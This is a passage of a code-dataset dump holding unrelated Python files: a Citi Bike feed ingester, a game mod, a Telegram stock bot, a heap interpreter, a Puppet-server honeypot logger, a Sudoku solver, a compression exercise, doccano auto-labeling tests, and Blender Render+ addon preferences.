)\n\n# also add local (NYC) time\ntimestamp_nyc = timestamp_utc.tz_convert(tz='America/New_York')\n#df['timestamp_nyc'] = timestamp_nyc.to_datetime64()\n#df['timestamp_nyc'] = pd.to_datetime(df['timestamp_nyc'])\n\n# add yearh, hour, day of year (using NY time)\n#df['year']=df.timestamp_nyc.dt.year\n#df['hour']=df.timestamp_nyc.dt.hour\n#df['yday']=df.timestamp_nyc.dt.dayofyear\ndf['year']=timestamp_nyc.year\ndf['hour']=timestamp_nyc.hour\ndf['yday']=timestamp_nyc.dayofyear\n\n# write the data to sql database\n#con = sqlite3.connect(\"/Users/Andy/Springboard_DataScience/Capstone_1/data/citibike_feeds.db3\")\ncon = sqlite3.connect(\"/Users/Andy/Projects/NYC_citibike/data/citibike_feeds.db3\")\ndf.to_sql(\"station_status\",con,if_exists='append',index=False)\ncon.close()\n","sub_path":"src/read_citibike_streaming.py","file_name":"read_citibike_streaming.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"460971179","text":"import bl2sdk\n\n\nclass Crosshair(bl2sdk.BL2MOD):\n Name = \"No Crosshair\"\n Description = \"Removes the crosshairs.\"\n Author = \"Juso\"\n\n bZoomed = False\n\n def disable_crosshair(self, caller, function, params):\n if not self.bZoomed:\n caller.bCrosshairEnabled = False\n caller.bSuppressCrosshair = True\n else:\n caller.bCrosshairEnabled = True\n caller.bSuppressCrosshair = False\n\n def handle_zooming(self, caller, function, params):\n if params.NewZoomState == 2:\n self.bZoomed = True\n caller.bCrosshairEnabled = True\n else:\n self.bZoomed = False\n caller.bCrosshairEnabled = False\n\n crosshair_hook = \"WillowWeapon.Active.BeginState\"\n zoom_hook = \"WillowGame.WillowWeapon.SetZoomState\"\n\n def Enable(self):\n bl2sdk.RegisterHook(self.crosshair_hook, \"CrosshairHook\", CrosshairHook)\n bl2sdk.RegisterHook(self.zoom_hook, \"ZoomHook\", IsZoomingHook)\n\n def Disable(self):\n bl2sdk.RemoveHook(self.crosshair_hook, \"CrosshairHook\")\n bl2sdk.RemoveHook(self.zoom_hook, \"ZoomHook\")\n\n\nCrosshairInstance = Crosshair()\n\n\ndef CrosshairHook(caller: bl2sdk.UObject, function: bl2sdk.UFunction, params: bl2sdk.FStruct) -> bool:\n CrosshairInstance.disable_crosshair(caller, function, params)\n return True\n\n\ndef IsZoomingHook(caller: bl2sdk.UObject, function: bl2sdk.UFunction, params: bl2sdk.FStruct) -> bool:\n CrosshairInstance.handle_zooming(caller, function, params)\n return True\n\nbl2sdk.Mods.append(CrosshairInstance)\n","sub_path":"NoCrosshair/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"338593436","text":"from insert import add_stock, unsent_stocks, upcoming_stocks\nfrom telegram import publish_stock, remind_and_pin\n\n\ndef publish_stocks():\n # fetch and store new stocks before publishing to the channel\n add_stock()\n\n unpublished_stocks = list(unsent_stocks())\n if unpublished_stocks:\n from models import session\n for the_stock in unpublished_stocks:\n publish_stock(the_stock)\n session.commit()\n return print(f\"published {len(unpublished_stocks)} stocks\")\n\n\ndef remind_stock():\n upcoming_issues = list(upcoming_stocks())\n if upcoming_issues:\n for issue in upcoming_issues:\n remind_and_pin(issue)\n return print(f\"reminded about {len(upcoming_issues)} stock\")\n\n\nif __name__ == '__main__':\n publish_stocks()\n remind_stock()\n","sub_path":"stocks.py","file_name":"stocks.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"89568282","text":"# File: HeapScript.py\n# Author: Szymon Wróbel\n\nfrom CormenHeap import CormenHeap\nfrom typing import List, Tuple, Callable\n\ndef handle_empty(heap: CormenHeap, _: List[str]) -> None:\n print(1 if heap.empty() else 0)\n\ndef handle_insert(heap: CormenHeap, tokens: List[str]) -> None:\n try:\n item = int(tokens[1])\n priority = int(tokens[2])\n heap.insert(item, priority)\n except ValueError:\n print(\"Invalid input format\")\n\ndef handle_top(heap: CormenHeap, _: List[str]) -> None:\n print(heap.top() if not heap.empty() else \"\")\n\ndef handle_pop(heap: CormenHeap, _: List[str]) -> None:\n print(heap.pop() if not heap.empty() else \"\")\n\ndef handle_priority(heap: CormenHeap, tokens: List[str]) -> None:\n try:\n item = int(tokens[1])\n priority = int(tokens[2])\n heap.priority(item, priority)\n except ValueError:\n print(\"Invalid input format\")\n\ndef handle_print(heap: CormenHeap, _: List[str]) -> None:\n print(heap.data)\n\ndef dispatch(heap: CormenHeap, tokens: List[str]) -> None:\n actions: List[Tuple[str, Callable]] = [\n (\"insert\", handle_insert),\n (\"empty\", handle_empty),\n (\"top\", handle_top),\n (\"pop\", handle_pop),\n (\"priority\", handle_priority),\n (\"print\", handle_print)\n ]\n\n for (cmd, act) in actions:\n if cmd == tokens[0]:\n act(heap, tokens)\n break\n else:\n print(\"Unknown command: \" + tokens[0])\n \ndef interpret(heap: CormenHeap, input: str) -> None:\n tokens = input.rstrip().split(' ')\n dispatch(heap, tokens)","sub_path":"lista5/src/HeapScript.py","file_name":"HeapScript.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"599099653","text":"from bottle import route, run, template, request, error, response\nimport requests\nimport os.path\nimport configparser\nimport datetime\nimport codecs\nfrom bottle import Bottle, request, response\nfrom datetime import datetime\nimport logging\n\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO , filename='/var/log/puppetpot.txt')\n\n# set up logging to console\nconsole = logging.StreamHandler()\nconsole.setLevel(logging.ERROR)\n# set a format which is simpler for console use\n\nformatter = logging.Formatter('%(asctime)s : %(message)s')\nconsole.setFormatter(formatter)\nlogging.getLogger(\"\").addHandler(console)\n\n#\n# read config from eventually existing T-Pot installation (see dtag-dev-sec.github.io)\n#\ndef getConfig():\n if os.path.isfile('/data/ews/conf/ews.cfg'):\n config2 = configparser.ConfigParser()\n config2.read('/data/ews/conf/ews.cfg')\n username = config2.get(\"EWS\", \"username\")\n token = config2.get(\"EWS\", \"token\")\n server = config2.get(\"EWS\", \"rhost_first\")\n nodeid = config2.get(\"GLASTOPFV3\", \"nodeid\")\n\n return (username, token, server, nodeid)\n else:\n return (None, None, None, None)\n\n#\n# log data for DTAG TPot\n#\ndef logData(attackerIP, attackerRequest, host):\n\n if os.path.isfile('/data/ews/conf/ews.cfg'):\n\n curDate = datetime.datetime.strftime(datetime.datetime.now(), '%Y-%m-%dT%H:%M:%S')\n\n dumpStr = \"{\\\"timestamp\\\":\\\"\" + curDate + \"\\\",\\\"event_type\\\":\\\"alert\\\",\\\"src_ip\\\":\\\"\"+attackerIP+\"\\\",\\\"src_port\\\":0,\\\"dest_ip\\\":\\\"127.0.0.1\\\",\\\"dest_port\\\":8140,\\\"honeypot\\\":{\\\"name\\\":\\\"Elasticpot\\\",\\\"nodeid\\\":\\\"puppet\\\"}}\\r\\n\"\n\n with open(\"/data/puppetpot/log/puppetpot.log\", \"a\") as myfile:\n myfile.write(dumpStr)\n\n\n#\n# send the data back to the defined server (e.g. DTAG T-Pot environment)\n#\ndef postdata(url, content, ip):\n\n username, token, server, nodeid = getConfig()\n\n if (username == None):\n return\n\n logData(ip, url, server)\n\n nodeid = \"puppetpot-\" + nodeid\n\n txt = open(\"./templates/ews.txt\")\n xml = txt.read()\n\n out = codecs.encode(url.encode(\"UTF-8\"), 'base64_codec')\n\n xml = xml.replace(\"_IP_\", ip)\n xml = xml.replace(\"_USERNAME_\", username)\n xml = xml.replace(\"_TOKEN_\", token)\n\n xml = xml.replace(\"_URL_\", url)\n xml = xml.replace(\"_RAW_\", out.decode(\"utf-8\") )\n xml = xml.replace(\"_NODEID_\", nodeid)\n\n curDate = datetime.datetime.strftime(datetime.datetime.now(), '%Y-%m-%d %H:%M:%S')\n\n xml = xml.replace(\"_TIME_\", curDate)\n\n headers = {'Content-Type': 'application/xml'}\n requests.post(server, data=xml, headers=headers)\n\n\n#\n# retrieve IP from request\n#\ndef getIP(request):\n\n ip = request.environ.get('X-Forwarded-For')\n if ip != None:\n return ip\n\n return \"\"\n\n\n\n@error(404)\ndef error404(error):\n\n ip = getIP(request)\n\n logging.error(\"HTTP Code 404: \" + request.url + \" from ip \" + ip)\n return ''\n\n@error(500)\ndef error500(error):\n\n ip = getIP(request)\n\n logging.error(\"HTTP Code 500: \" + request.url + \" from ip \" + ip)\n\n return ''\n\n\n@route('/production/certificate_request/', method=\"GET\")\ndef handleCertificateRequestGET(node):\n\n response.content_type = 'text/plain'\n ip = getIP(request)\n\n\n # dummy code\n response.status = 200\n return \"\"\n\n@route('/production/certificate_request/', method=\"PUT\")\ndef handleCertificateRequestPUT(node):\n\n ip = getIP(request)\n logging.info(request.url+ \" from ip \" + ip)\n\n response.content_type = 'text/plain'\n postContent = \"\"\n\n for l in request.body:\n postContent += l.decode(\"utf-8\")\n\n # dummy code\n response.status = 200\n return \"\"\n\n@route('/production/certificate/', method=\"GET\")\ndef handleCertificatesCA(node):\n\n ip = getIP(request)\n logging.info(request.url + \" from ip \" + ip)\n\n response.content_type = 'text/plain'\n\n if node == 'ca':\n txt = open(\"./templates/ca.pem\")\n indexData = txt.read()\n return indexData\n# else:\n# txt = open(\"./templates/node.pem\")\n\n # dummy code\n response.status = 200\n return \"\"\n\n@route('/certificates/ca', method=\"GET\")\ndef handleCertificatesCA():\n\n ip = getIP(request)\n logging.info(request.url + \" from ip \" + ip)\n\n txt = open(\"./templates/ca.pem\")\n indexData = txt.read()\n\n return indexData\n\n\n#\n# listen to all ports to keep\n#\n\nrun(host='0.0.0.0', port=8141)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"593110328","text":"def solution(msg):\n dic = {}\n i = 1\n for c in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':\n dic[c] = i\n i += 1\n index = 0\n answer = []\n while index < len(msg):\n for i in range(len(msg), index, -1):\n mes = msg[index:i]\n if mes in dic:\n answer.append(dic[mes])\n if i != len(msg):\n dic[msg[index:i + 1]] = max(dic.values()) + 1\n index = i\n break\n\n return answer","sub_path":"Programmers/2018 KAKAO/압축.py","file_name":"압축.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"463165525","text":"import pathlib\nfrom unittest.mock import patch\n\nfrom auto_labeling_pipeline.mappings import AmazonComprehendSentimentTemplate\nfrom auto_labeling_pipeline.models import RequestModelFactory\nfrom rest_framework import status\nfrom rest_framework.reverse import reverse\n\nfrom ...models import DOCUMENT_CLASSIFICATION, IMAGE_CLASSIFICATION\nfrom .utils import (CRUDMixin, make_auto_labeling_config, make_doc, make_image,\n prepare_project)\n\ndata_dir = pathlib.Path(__file__).parent / 'data'\n\n\nclass TestConfigParameter(CRUDMixin):\n\n def setUp(self):\n self.project = prepare_project(task=DOCUMENT_CLASSIFICATION)\n self.data = {\n 'model_name': 'GCP Entity Analysis',\n 'model_attrs': {'key': 'hoge', 'type': 'PLAIN_TEXT', 'language': 'en'},\n 'text': 'example'\n }\n self.url = reverse(viewname='auto_labeling_parameter_testing', args=[self.project.item.id])\n\n @patch('api.views.auto_labeling.AutoLabelingConfigParameterTest.send_request', return_value={})\n def test_called_with_proper_model(self, mock):\n self.assert_create(self.project.users[0], status.HTTP_200_OK)\n _, kwargs = mock.call_args\n expected = RequestModelFactory.create(self.data['model_name'], self.data['model_attrs'])\n self.assertEqual(kwargs['model'], expected)\n\n @patch('api.views.auto_labeling.AutoLabelingConfigParameterTest.send_request', return_value={})\n def test_called_with_text(self, mock):\n self.assert_create(self.project.users[0], status.HTTP_200_OK)\n _, kwargs = mock.call_args\n self.assertEqual(kwargs['example'], self.data['text'])\n\n @patch('api.views.auto_labeling.AutoLabelingConfigParameterTest.send_request', return_value={})\n def test_called_with_image(self, mock):\n self.data['text'] = str(data_dir / 'images/1500x500.jpeg')\n self.assert_create(self.project.users[0], status.HTTP_200_OK)\n _, kwargs = mock.call_args\n self.assertEqual(kwargs['example'], self.data['text'])\n\n\nclass TestTemplateMapping(CRUDMixin):\n\n def setUp(self):\n self.project = prepare_project(task=DOCUMENT_CLASSIFICATION)\n self.data = {\n 'response': {\n 'Sentiment': 'NEUTRAL',\n 'SentimentScore': {\n 'Positive': 0.004438233096152544,\n 'Negative': 0.0005306027014739811,\n 'Neutral': 0.9950305223464966,\n 'Mixed': 5.80838445785048e-7\n }\n },\n 'template': AmazonComprehendSentimentTemplate().load()\n }\n self.url = reverse(viewname='auto_labeling_template_test', args=[self.project.item.id])\n\n def test_template_mapping(self):\n response = self.assert_create(self.project.users[0], status.HTTP_200_OK)\n expected = [{'label': 'NEUTRAL'}]\n self.assertEqual(response.json(), expected)\n\n def test_json_decode_error(self):\n self.data['template'] = ''\n self.assert_create(self.project.users[0], status.HTTP_400_BAD_REQUEST)\n\n\nclass TestLabelMapping(CRUDMixin):\n\n def setUp(self):\n self.project = prepare_project(task=DOCUMENT_CLASSIFICATION)\n self.data = {\n 'response': [{'label': 'NEGATIVE'}],\n 'label_mapping': {'NEGATIVE': 'Negative'}\n }\n self.url = reverse(viewname='auto_labeling_mapping_test', args=[self.project.item.id])\n\n def test_label_mapping(self):\n response = self.assert_create(self.project.users[0], status.HTTP_200_OK)\n expected = [{'label': 'Negative'}]\n self.assertEqual(response.json(), expected)\n\n\nclass TestConfigCreation(CRUDMixin):\n\n def setUp(self):\n self.project = prepare_project(task=DOCUMENT_CLASSIFICATION)\n self.data = {\n 'model_name': 'Amazon Comprehend Sentiment Analysis',\n 'model_attrs': {\n 'aws_access_key': 'str',\n 'aws_secret_access_key': 'str',\n 'region_name': 'us-east-1',\n 'language_code': 'en'\n },\n 'template': AmazonComprehendSentimentTemplate().load(),\n 'label_mapping': {'NEGATIVE': 'Negative'}\n }\n self.url = reverse(viewname='auto_labeling_configs', args=[self.project.item.id])\n\n def test_create_config(self):\n self.assert_create(self.project.users[0], status.HTTP_201_CREATED)\n\n\nclass TestAutoLabelingText(CRUDMixin):\n\n def setUp(self):\n self.project = prepare_project(task=DOCUMENT_CLASSIFICATION)\n make_auto_labeling_config(self.project.item)\n self.example = make_doc(self.project.item)\n self.url = reverse(viewname='auto_labeling_annotation', args=[self.project.item.id, self.example.id])\n\n @patch('api.views.auto_labeling.execute_pipeline', return_value=[])\n def test_text_task(self, mock):\n self.assert_create(self.project.users[0], status.HTTP_201_CREATED)\n _, kwargs = mock.call_args\n self.assertEqual(kwargs['text'], self.example.text)\n\n\nclass TestAutoLabelingImage(CRUDMixin):\n\n def setUp(self):\n self.project = prepare_project(task=IMAGE_CLASSIFICATION)\n make_auto_labeling_config(self.project.item)\n filepath = data_dir / 'images/1500x500.jpeg'\n self.example = make_image(self.project.item, str(filepath))\n self.url = reverse(viewname='auto_labeling_annotation', args=[self.project.item.id, self.example.id])\n\n @patch('api.views.auto_labeling.execute_pipeline', return_value=[])\n def test_text_task(self, mock):\n self.assert_create(self.project.users[0], status.HTTP_201_CREATED)\n _, kwargs = mock.call_args\n expected = str(self.example.filename)\n self.assertEqual(kwargs['text'], expected)\n","sub_path":"backend/api/tests/api/test_auto_labeling.py","file_name":"test_auto_labeling.py","file_ext":"py","file_size_in_byte":5751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"546431519","text":"import time\r\n\r\nclass Cell:\r\n def __init__(self):\r\n self.solvedNum = -1\r\n self.__allowedNums = [True for x in range (9)]\r\n def getAllowedNum(self, i):\r\n return self.__allowedNums[i-1]\r\n def setAllowedNum(self,i, b):\r\n self.__allowedNums[i - 1] = b\r\n\r\ndef printBoard(cells):\r\n print()\r\n print()\r\n for i in range(9):\r\n for j in range(9):\r\n print (\" \" if cells[i][j].solvedNum == -1 else cells[i][j].solvedNum, end = '')\r\n print()\r\n time.sleep(1)\r\n\r\ndef isCellsSolved(cells):\r\n for arr in cells:\r\n for c in arr:\r\n if c.solvedNum == -1:\r\n return False\r\n return True\r\n\r\ndef Solve(cells):\r\n while not isCellsSolved(cells) or not isImpossible:\r\n cells = SolveIter(cells)\r\n printBoard(cells)\r\n\r\ndef SolveIter(cells):\r\n newCells = cells\r\n for i in range(9):\r\n for j in range(9):\r\n newCells = FillIn(cells, i, j)\r\n return newCells\r\n\r\n# Fill in the cell at the specified spot\r\ndef FillIn(cells, x, y):\r\n if cells[x][y].solvedNum != -1:\r\n return cells\r\n\r\n # Check each Row & Column\r\n for i in range(9):\r\n if cells[x][i].solvedNum != -1:\r\n cells[x][y].setAllowedNum(cells[x][i].solvedNum, False)\r\n for i in range(9):\r\n if cells[i][y].solvedNum != -1:\r\n cells[x][y].setAllowedNum(cells[i][x].solvedNum, False)\r\n #Check each 3x3 cell\r\n for i in range(x-(x%3), 3+x-(x%3)):\r\n for j in range(y-(y%3), 3+y-(y%3)):\r\n if cells[i][j].solvedNum != -1:\r\n cells[x][y].setAllowedNum(cells[i][j].solvedNum, False)\r\n\r\n allowed = 0\r\n allowedNum = -1\r\n for i in range(1,10):\r\n if cells[x][y].getAllowedNum(i) == True:\r\n allowed += 1\r\n allowedNum = i\r\n if allowed == 0:\r\n isImpossible = True\r\n return cells\r\n elif allowed == 1:\r\n cells[x][y].solvedNum = i\r\n return cells\r\n\r\nisImpossible = False\r\npuzzle = [[Cell() for i in range(9)] for i in range(9)]\r\nfile = open(\"Sudoku.txt\")\r\nfor i in range(9):\r\n inputStr = file.readline()\r\n for j in range(9):\r\n c = Cell()\r\n if inputStr[j].isdigit():\r\n c.solvedNum = int(inputStr[j])\r\n puzzle[i][j] = c\r\n\r\nprintBoard(puzzle)\r\nSolve(puzzle)\r\nprintBoard(puzzle)\r\nprint(\"Done!\")","sub_path":"archive/Sudoku-Solver.py","file_name":"Sudoku-Solver.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"644836179","text":"# ------------------------------------------------------------------------------\n# LICENSE\n# ------------------------------------------------------------------------------\n# Render+ - Blender addon\n# (c) Copyright Diego Garcia Gangl (januz) - 2014, 2015\n# \n# ------------------------------------------------------------------------------\n# This file is part of Render+\n#\n# Render+ is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n# ------------------------------------------------------------------------------\n\nimport os\nimport platform\n\nimport bpy\nfrom bpy.props import (IntProperty, \n StringProperty,\n BoolProperty,\n EnumProperty,\n FloatProperty,\n FloatVectorProperty,\n CollectionProperty,\n PointerProperty)\n\nfrom . import utils\n\n\n# ------------------------------------------------------------------------------\n# CONVENIENCE STUFF\n# ------------------------------------------------------------------------------\n\n# Addon preferences\ntry:\n prefs = bpy.context.user_preferences.addons[__package__].preferences\nexcept KeyError:\n prefs = None\n\n\n# ------------------------------------------------------------------------------\n# ADDON PREFERENCES\n# ------------------------------------------------------------------------------\n\n\ndef default_path_debug():\n \"\"\" Create a useful default for support log \"\"\"\n \n return os.path.expanduser('~' + os.sep + 'renderplus_support.log')\n\n \ndef make_path_sane(key):\n \"\"\" Prevent Blender's relative paths of doom \"\"\"\n\n if prefs[key] and prefs[key].startswith('//'):\n prefs[key] = utils.sane_path(prefs[key])\n elif key == 'debug_file' and prefs.debug_file == '': \n prefs['debug_file'] = default_path_debug()\n\n\nclass RP_MT_MailQuickSetup(bpy.types.Menu):\n bl_idname = 'wm.rp_mt_mail_quick_setup'\n bl_label = 'Quick Setup'\n\n def draw(self, context):\n layout = self.layout\n\n layout.operator(\n 'renderplus.mail_quick_setup',\n text='Gmail').provider = 'GMAIL'\n layout.operator(\n 'renderplus.mail_quick_setup',\n text='Yahoo').provider = 'YAHOO'\n layout.operator(\n 'renderplus.mail_quick_setup',\n text='MSN/Hotmail/Live').provider = 'LIVE'\n\n\nclass RP_Preferences(bpy.types.AddonPreferences):\n\n \"\"\" Addon preferences for Render+ \"\"\"\n\n bl_idname = __package__\n \n # --------------------------------------------------------------------------\n # NOTIFICATIONS TAB\n\n sound_file = StringProperty(\n name='Custom Sound for notifications',\n description='Use notifications sound',\n subtype='FILE_PATH',\n update=lambda a,b: make_path_sane('sound_file'),\n default=utils.path('assets', 'notification.ogg')\n )\n\n sound_volume = FloatProperty(\n name='Sound Volume',\n description='Set the volume for sound notifications',\n default=90.0,\n min=0,\n max=100.0\n )\n\n mail_user = StringProperty(\n name='Username',\n description='User to login into the mail server',\n default=''\n )\n\n mail_password = StringProperty(\n name='Password',\n description='Password to login into the mail server',\n subtype='PASSWORD',\n default=''\n )\n\n mail_ssl = BoolProperty(\n name='Use SSL',\n description='Connect to mail server using Secure Sockets',\n default=False,\n )\n\n mail_server = StringProperty(\n name='Mail server (SMTP)',\n description='Server to send use when sending mails',\n default=''\n )\n\n mail_to = StringProperty(\n name='Send to',\n description='Address to send mail to',\n )\n\n # --------------------------------------------------------------------------\n # BATCH TAB\n\n show_batch = BoolProperty(\n name='Show Batch render panel',\n description='Show Batch rendering panel in render properties',\n default=True,\n )\n\n batch_refresh_interval = FloatProperty(\n name='Refresh interval for batch panel',\n description=('Time between refreshes in the UI panel while a batch is'\n 'running (in seconds).'),\n default=1.0,\n min=0.2,\n max=60.0\n )\n \n batch_new_dirs = BoolProperty(\n name = 'Automatically create directories when rendering',\n description = ('Try to create directories set in output paths' \n ' if they don\\'t exist when rendering.'),\n default = True,\n )\n \n batch_use_custom_css = BoolProperty(\n name = 'Use a custom CSS file for RSS feeds',\n description = 'Use a custom stylesheet for RSS feeds',\n default = False,\n )\n \n batch_custom_css = StringProperty(\n name = 'Custom CSS file',\n description = 'Custom CSS file to use for RSS Feeds',\n default = '',\n update=lambda a,b: make_path_sane('batch_custom_css'),\n subtype = 'FILE_PATH',\n )\n\n batch_cuda_devices = IntProperty( \n name='Amount of Cuda devices in system',\n min=-1,\n max=64,\n default=-1,\n )\n\n batch_cuda_active = StringProperty( \n name='Cuda device set in preferences',\n default='',\n )\n \n blender_path = StringProperty(\n name='Custom Blender Command',\n description=('Blender to use for batches. Type a'\n 'command or point this to the Blender executable.'),\n update=lambda a,b: make_path_sane('blender_path'),\n subtype='FILE_PATH'\n )\n\n term_path = StringProperty(\n name='Custom Terminal Command',\n description=('Terminal to use for batches. Type a'\n 'command or point this to a terminal executable.'),\n update=lambda a,b: make_path_sane('term_path'),\n subtype='FILE_PATH'\n )\n\n # --------------------------------------------------------------------------\n # HELP TAB\n\n\n enable_debug = BoolProperty(\n name='Generate support log',\n description=('Enable debugging output. This is used to get information'\n 'when reporting a bug, or requesting support.'),\n default = False,\n )\n\n debug_file = StringProperty(\n name='Support log file',\n description='Where to save the support log output',\n update=lambda a,b: make_path_sane('debug_file'),\n subtype='FILE_PATH',\n default=default_path_debug(),\n )\n\n ui_tab = EnumProperty(\n name='Tab',\n description='Tab in the preferences editor',\n items=(('NOTIFICATIONS', 'Notifications', ''),\n ('BATCH', 'Batch', ''),\n ('HELP', 'Help', ''),\n ),\n default='NOTIFICATIONS')\n\n\n\n def draw(self, context):\n layout = self.layout\n\n row = layout.row()\n row.prop(self, 'ui_tab', expand=True)\n\n if self.ui_tab == 'NOTIFICATIONS':\n layout.separator()\n layout.prop(self, 'sound_file', icon='PLAY_AUDIO')\n row = layout.row()\n row.label(text='Sound Volume')\n row.prop(self, 'sound_volume', text='', slider=True)\n layout.separator()\n layout.separator()\n\n split = layout.split(0.75)\n split.label(text='Email Setup', icon='SCRIPTWIN')\n split.menu('wm.rp_mt_mail_quick_setup')\n\n split = layout.split(1.0)\n col = split.column()\n col.prop(self, 'mail_to')\n col.separator()\n col.prop(self, 'mail_user')\n col.prop(self, 'mail_password')\n\n col.prop(self, 'mail_server')\n col.prop(self, 'mail_ssl')\n\n elif self.ui_tab == 'BATCH':\n layout.separator()\n layout.prop(self, 'show_batch')\n \n row = layout.row()\n row.enabled = self.show_batch\n row.prop(self, 'batch_refresh_interval')\n layout.separator()\n \n row = layout.row()\n row.prop(self, 'batch_new_dirs')\n \n split = layout.split(0.4)\n \n col = split.column()\n col.prop(self, 'batch_use_custom_css')\n \n col = split.column()\n col.enabled = self.batch_use_custom_css\n col.prop(self, 'batch_custom_css', text='')\n\n \n layout.separator()\n layout.prop(self, 'blender_path', icon='BLENDER')\n layout.prop(self, 'term_path', icon='CONSOLE')\n layout.label(text=('Fill this if you want to use a different'\n ' Blender or Terminal for batches.'\n ' Leave emtpy to use defaults.'), icon='INFO')\n layout.separator()\n \n elif self.ui_tab == 'HELP':\n layout.prop(self, 'enable_debug')\n\n layout.separator()\n\n if self.enable_debug:\n privacy = (\n 'The debug file will contain the following information '\n 'about your system: Operating system, Blender version and branch.')\n\n layout.prop(self, 'debug_file')\n layout.label(privacy, icon='INFO')\n\n layout.separator()\n\n\n# ------------------------------------------------------------------------------\n# BATCH OPERATOR SETTINGS\n# ------------------------------------------------------------------------------\n\n# These are settings used by operators. They are set as props here \n# so they can be shown in panels, instead of popups.\n\nsuffix_options =(\n ('NONE', 'None', ''),\n ('SCENE', 'Scene', ''),\n ('RENDERLAYER', 'Render Layer', ''),\n ('CAMERA', 'Camera', ''),\n ) \n\nclass RP_Batch_Ops_OutputChange(bpy.types.PropertyGroup):\n\n \"\"\" Data for Output Change \"\"\"\n \n # Output \n # --------------------------------------------------------------------------\n base_directory = StringProperty(\n name='Base directory',\n default='', \n subtype='FILE_PATH'\n )\n \n base_filename = StringProperty(\n name='Base filename',\n default='', \n )\n\n \n # Suffixes for filenames\n # --------------------------------------------------------------------------\n name_suffix_01 = EnumProperty(\n items= suffix_options,\n name='First Suffix',\n )\n\n name_suffix_02 = EnumProperty(\n items= suffix_options,\n name='Second Suffix',\n )\n\n name_suffix_03 = EnumProperty(\n items= suffix_options,\n name='Third Suffix',\n )\n\n\n # Subdirectories\n # --------------------------------------------------------------------------\n subdirs_scene = BoolProperty(\n name='Scenes',\n description='Make subir for each scene',\n default=False,\n )\n\n subdirs_cam = BoolProperty(\n name='Cameras',\n description='Make subir for each camera',\n default=False,\n )\n \n subdirs_layer = BoolProperty(\n name='Render Layers',\n description='Make subir for each renderlayer',\n default=False,\n )\n\n\nclass RP_Batch_Ops_QuickBatch(bpy.types.PropertyGroup):\n\n \"\"\" Data for Quick Batch \"\"\"\n \n tiles_x = IntProperty( \n name='Horizontal Tiles',\n min=1,\n max=10,\n default=2,\n )\n\n tiles_y = IntProperty( \n name='Vertical Tiles',\n min=1,\n max=10,\n default=2,\n )\n\n output_path = StringProperty(\n name='Output path',\n default='', \n subtype='FILE_PATH'\n )\n \n size_x = IntProperty( \n name='Width',\n min=1,\n max=10000,\n default=1,\n subtype='PIXEL',\n )\n \n size_y = IntProperty( \n name='Height',\n min=1,\n max=100000,\n default=1,\n subtype='PIXEL',\n )\n \n scene = StringProperty(default=\"\", name=\"Scene\")\n \n all_scenes = BoolProperty(default=False, name=\"Use all scenes\")\n \n use_animation = BoolProperty( \n name='Animation',\n default=True, \n description='Make animation render jobs',\n )\n \n no_camera = BoolProperty( \n name='Don\\'t use cameras',\n default=False, \n description='Don\\'t setup cameras for render jobs',\n )\n \n \n \nclass RP_Batch_Ops(bpy.types.PropertyGroup):\n \"\"\" Settings for operators \"\"\"\n \n output_change = PointerProperty(type=RP_Batch_Ops_OutputChange)\n quick_batch = PointerProperty(type=RP_Batch_Ops_QuickBatch)\n \n \n# ------------------------------------------------------------------------------\n# RENDER JOB\n# ------------------------------------------------------------------------------\n\n# ------------------------------------------------------------------------------\n# HELPER FUNCTIONS\n\n\ndef check_job_name(name):\n \"\"\" Make sure the job name is unique \"\"\"\n\n def check_duplicate(i, name_to_check):\n \"\"\" check new names recursively \"\"\"\n \n if name_to_check not in seen:\n return name_to_check\n else:\n i += 1\n correct_name = '{0}.{1:0>3}'.format(name, i) \n return check_duplicate(i, correct_name)\n\n # -------------------------------------------------------------------------- \n batch = bpy.context.scene.renderplus.batch.jobs\n seen = set()\n i = 0\n \n for job in batch:\n if job.name not in seen:\n seen.add(job.name)\n \n return check_duplicate(i, name)\n\n\ndef set_job_name(self, value):\n \"\"\" Wrapper to call check_job_name \"\"\"\n\n if 'name' in self and self['name'] == value:\n return\n\n self['name'] = check_job_name(value)\n\n\ndef get_job_name(self):\n \"\"\" Get the job's name \"\"\"\n\n # Sometimes draw() calls this, before it's defined\n if 'name' in self:\n return self['name']\n else:\n return 'Untitled Render Job'\n\n\ndef default_job_name():\n \"\"\" Return the default name for a job \"\"\"\n\n return check_job_name('New Render Job')\n\n\ndef fill_job_from_scene(self, context):\n \"\"\" Populate all fields for render job from scene data \"\"\"\n \n batch_list = bpy.context.scene.renderplus.batch.jobs\n index = bpy.context.scene.renderplus.batch.index\n \n if batch_list[index].use_external:\n return\n \n try:\n scene = bpy.data.scenes[batch_list[index].scene]\n except KeyError:\n return\n \n try:\n batch_list[index].camera = scene.camera.name\n except AttributeError:\n pass\n \n try:\n batch_list[index].world = scene.world.name\n except AttributeError:\n pass\n \n batch_list[index].layer = scene.render.layers[0].name\n \n 